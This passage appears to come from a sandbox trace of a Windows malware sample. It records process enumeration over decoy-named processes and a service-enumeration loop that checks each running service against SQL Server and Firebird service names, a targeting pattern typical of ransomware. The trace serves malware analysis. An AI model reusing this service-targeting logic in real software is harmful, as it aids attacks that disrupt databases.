hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0045.265] lstrlenW (lpString="defeat preston.exe") returned 18 [0045.265] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0045.265] lstrlenW (lpString="boss isolated.exe") returned 17 [0045.266] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0045.266] lstrlenW (lpString="member.exe") returned 10 [0045.266] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0045.267] lstrlenW (lpString="chubby-er.exe") returned 13 [0045.267] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0045.267] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0045.267] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0045.268] lstrlenW (lpString="organization.exe") returned 16 [0045.268] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0045.269] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0045.269] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0045.269] lstrlenW (lpString="spray-roman.exe") returned 15 [0045.269] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0045.270] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0045.270] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0045.271] lstrlenW (lpString="tank attacks.exe") returned 16 [0045.271] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0045.272] lstrlenW (lpString="wires jacket.exe") returned 16 [0045.272] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0045.272] lstrlenW (lpString="values.exe") returned 10 [0045.273] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0045.273] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0045.273] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0045.274] lstrlenW (lpString="printersaerospace.exe") returned 21 [0045.274] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0045.275] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0045.275] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0045.276] lstrlenW (lpString="dllhost.exe") returned 11 [0045.276] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0045.276] lstrlenW (lpString="joke.exe") returned 8 [0045.276] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0045.277] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0045.277] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0045.278] lstrlenW (lpString="documents.exe") returned 13 [0045.278] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0045.279] lstrlenW (lpString="rebel.exe") returned 9 [0045.279] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0045.279] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0045.279] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0045.319] lstrlenW (lpString="conhost.exe") returned 11 [0045.319] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0045.320] lstrlenW (lpString="conhost.exe") returned 11 [0045.320] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0045.321] lstrlenW (lpString="hgaibc.exe") returned 10 [0045.321] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0045.321] lstrlenW (lpString="cmd.exe") returned 7 [0045.321] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x12c, pcPriClassBase=8, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0045.322] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0045.322] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0045.323] lstrlenW (lpString="conhost.exe") returned 11 [0045.323] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0045.324] CloseHandle (hObject=0x2a8) returned 1 [0045.324] Sleep (dwMilliseconds=0x1f4) [0046.604] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ec00 [0046.605] EnumServicesStatusExW (in: hSCManager=0x60ec00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0046.605] GetLastError () returned 0xea [0046.605] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1ce8) returned 0x6358f0 [0046.605] EnumServicesStatusExW (in: hSCManager=0x60ec00, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6358f0, cbBufSize=0x1ce8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6358f0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0046.606] CloseServiceHandle (hSCObject=0x60ec00) returned 1 [0046.606] lstrlenW (lpString="Appinfo") returned 7 [0046.606] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0046.606] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0046.606] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0046.606] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0046.606] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0046.606] lstrlenW (lpString="AppXSvc") returned 7 [0046.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0046.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0046.607] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0046.607] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0046.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0046.607] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0046.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.607] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0046.607] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0046.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0046.607] lstrlenW (lpString="Audiosrv") returned 8 [0046.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0046.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0046.607] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0046.607] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0046.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0046.607] lstrlenW (lpString="BFE") returned 3 [0046.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0046.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0046.607] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0046.607] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0046.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0046.607] lstrlenW (lpString="BITS") returned 4 [0046.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0046.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0046.607] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0046.607] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0046.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0046.607] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0046.607] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0046.607] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0046.607] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0046.607] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0046.607] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0046.607] lstrlenW (lpString="CDPSvc") returned 6 [0046.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0046.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0046.608] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0046.608] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0046.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0046.608] lstrlenW (lpString="ClickToRunSvc") returned 13 [0046.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0046.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0046.608] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0046.608] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0046.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0046.608] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0046.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0046.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0046.608] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0046.608] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0046.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0046.608] lstrlenW (lpString="CryptSvc") returned 8 [0046.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0046.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0046.608] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0046.608] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0046.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0046.608] lstrlenW (lpString="DcomLaunch") returned 10 [0046.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.608] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0046.608] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0046.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0046.608] lstrlenW (lpString="DeviceAssociationService") returned 24 [0046.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0046.608] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0046.608] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0046.608] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0046.608] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0046.608] lstrlenW (lpString="Dhcp") returned 4 [0046.608] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0046.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0046.609] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0046.609] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0046.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0046.609] lstrlenW (lpString="Dnscache") returned 8 [0046.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0046.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0046.609] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0046.609] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0046.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0046.609] lstrlenW (lpString="DoSvc") returned 5 [0046.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0046.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0046.609] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0046.609] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0046.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0046.609] lstrlenW (lpString="DPS") returned 3 [0046.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0046.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0046.609] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0046.609] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0046.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0046.609] lstrlenW (lpString="DusmSvc") returned 7 [0046.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0046.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0046.609] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0046.609] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0046.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0046.609] lstrlenW (lpString="EventLog") returned 8 [0046.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0046.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0046.609] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0046.609] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0046.609] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0046.609] lstrlenW (lpString="EventSystem") returned 11 [0046.609] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0046.609] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0046.610] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0046.610] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0046.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0046.610] lstrlenW (lpString="FontCache") returned 9 [0046.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0046.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0046.610] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0046.610] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0046.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0046.610] lstrlenW (lpString="gpsvc") returned 5 [0046.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0046.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0046.610] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0046.610] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0046.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0046.610] lstrlenW (lpString="iphlpsvc") returned 8 [0046.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.610] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0046.610] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0046.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0046.610] lstrlenW (lpString="KeyIso") returned 6 [0046.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0046.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0046.610] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0046.610] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0046.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0046.610] lstrlenW (lpString="LanmanServer") returned 12 [0046.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0046.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0046.610] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0046.610] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0046.610] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0046.610] lstrlenW (lpString="LanmanWorkstation") returned 17 [0046.610] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.610] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.611] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0046.611] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0046.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0046.611] lstrlenW (lpString="lfsvc") returned 5 [0046.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0046.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0046.611] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0046.611] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0046.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0046.611] lstrlenW (lpString="lmhosts") returned 7 [0046.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0046.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0046.611] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0046.611] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0046.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0046.611] lstrlenW (lpString="LSM") returned 3 [0046.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0046.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0046.611] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0046.611] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0046.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0046.611] lstrlenW (lpString="MpsSvc") returned 6 [0046.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0046.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0046.611] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0046.611] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0046.611] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0046.611] lstrlenW (lpString="NcbService") returned 10 [0046.611] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0046.611] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0046.611] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0046.612] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0046.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0046.612] lstrlenW (lpString="netprofm") returned 8 [0046.612] lstrcmpiW 